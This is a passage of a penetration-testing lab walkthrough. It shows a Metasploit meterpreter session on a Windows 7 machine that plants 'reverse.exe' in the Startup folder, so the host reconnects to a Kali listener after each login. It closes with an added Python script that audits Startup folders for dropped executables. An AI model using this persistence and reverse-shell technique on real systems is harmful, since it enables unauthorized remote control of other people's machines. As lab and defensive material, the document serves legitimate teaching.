msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x64/win64  WIN7\soldesk @ WIN7  192.168.20.50:4444 -> 192.168.20.202:49190 (192.168.20.202)

 

 

 - Take control of Windows 7

 

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

 

meterpreter >

meterpreter > sysinfo
Computer        : WIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64

 

meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:ac:07:68
MTU          : 1500
IPv4 Address : 192.168.20.202
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::813f:bb18:8a6:9cfe
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:14ca
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

 

 

meterpreter > getuid
Server username: WIN7\root


meterpreter > pwd
C:\Users\soldesk\Desktop


meterpreter > lpwd
/root/bin


meterpreter > ls
Listing: C:\Users\soldesk\Desktop
=================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2016-05-30 16:08:29 +0900  Security
100666/rw-rw-rw-  282   fil   2015-12-11 17:45:11 +0900  desktop.ini
100777/rwxrwxrwx  7168  fil   2016-06-03 16:13:33 +0900  reverse.exe


meterpreter > download -r desktop.ini /root/bin
[*] downloading: desktop.ini -> /root/bin/desktop.ini
[*] skipped    : desktop.ini -> /root/bin/desktop.ini

 

meterpreter > pwd
C:\Users\soldesk\Desktop

 

meterpreter > cd ..
meterpreter > pwd
C:\Users\soldesk

 


meterpreter > cd AppData
meterpreter > cd Roaming
meterpreter > cd Microsoft
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft


meterpreter > cd Windows

meterpreter > cd "Start Menu"
meterpreter > cd Programs
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs

 

meterpreter > cd Startup
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


meterpreter > upload reverse.exe
[*] uploading  : reverse.exe -> reverse.exe
[*] uploaded   : reverse.exe -> reverse.exe

 

meterpreter >
meterpreter > reboot
Rebooting...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed.  Reason: Died

msf exploit(handler) > quit
root@kali:~/bin#

 

 

 

 

Ex8) Running the backdoor 'reverse_resource.rc'

 

@ Kali Linux

 

root@kali:~/bin# msfconsole -r reverse_resource.rc
~ (omitted) ~

 

[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Starting the payload handler...

 

 

 

 

Ex9) Checking Windows 7

 Rebooting in progress


 

 

Windows Start -> All Programs -> Startup -> confirm 'reverse'

 

 

 

 

 

 

Ex10) Checking the state of the backdoor 'reverse_resource.rc'

 - When the Windows 7 user logs in, 'reverse.exe' runs automatically, so the host automatically connects back to Kali Linux.

 

@ Kali Linux

 

msf exploit(handler) >

[*] Sending stage (1188911 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49179) at 2016-06-03 16:55:25 +0900

 

msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x64/win64  WIN7\soldesk @ WIN7  192.168.20.50:4444 -> 192.168.20.202:49179 (192.168.20.202)


msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

 

meterpreter > sysinfo
Computer        : WIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
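The persistence in the steps above relies on an executable dropped into the user's Startup folder. As an added example that is not part of the original page, this Python script audits such a folder from the defender's side and reports every file that is really a PE executable, whatever its extension, with its size and SHA-256. The folder scanned by `demo()` is constructed in a temporary directory; `STARTUP_DIRS` lists the real Windows locations (the per-user path from the page, with a placeholder user name, and the all-users path) as an assumption for running it on a host.

```python
"""Added example (not from the original page): audit a Windows Startup folder, the
persistence location used in the lab above, and report every file that is really a
PE executable regardless of its extension.  The folder scanned by demo() is constructed."""
import hashlib
import tempfile
from pathlib import Path

# Real Startup locations, assumed for running on a host; the per-user one is the page's path.
STARTUP_DIRS = [
    r"C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
]

def is_pe(path: Path) -> bool:
    """True if the file has a DOS 'MZ' header and a 'PE\\0\\0' signature at e_lfanew."""
    with path.open("rb") as f:
        head = f.read(0x40)
        if len(head) < 0x40 or head[:2] != b"MZ":
            return False
        f.seek(int.from_bytes(head[0x3C:0x40], "little"))  # e_lfanew
        return f.read(4) == b"PE\0\0"

def audit_startup(folder: Path) -> list[dict]:
    """Name, size and SHA-256 of every PE file in the folder, .exe or not."""
    findings = []
    for p in sorted(folder.iterdir()):
        if p.is_file() and is_pe(p):
            data = p.read_bytes()
            findings.append({"name": p.name, "size": len(data),
                             "sha256": hashlib.sha256(data).hexdigest()})
    return findings

def fake_pe() -> bytes:
    """Constructed 148-byte PE-like stub (not a runnable program) for the demo."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    header[0x3C:0x40] = (0x80).to_bytes(4, "little")  # e_lfanew points at the PE signature
    return bytes(header) + b"PE\0\0" + bytes(16)

def demo() -> list[dict]:
    """Constructed Startup folder: a dropped reverse.exe, a PE hiding as notes.txt, and desktop.ini."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "reverse.exe").write_bytes(fake_pe())
        Path(d, "notes.txt").write_bytes(fake_pe())
        Path(d, "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\n")
        return audit_startup(Path(d))
```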



 

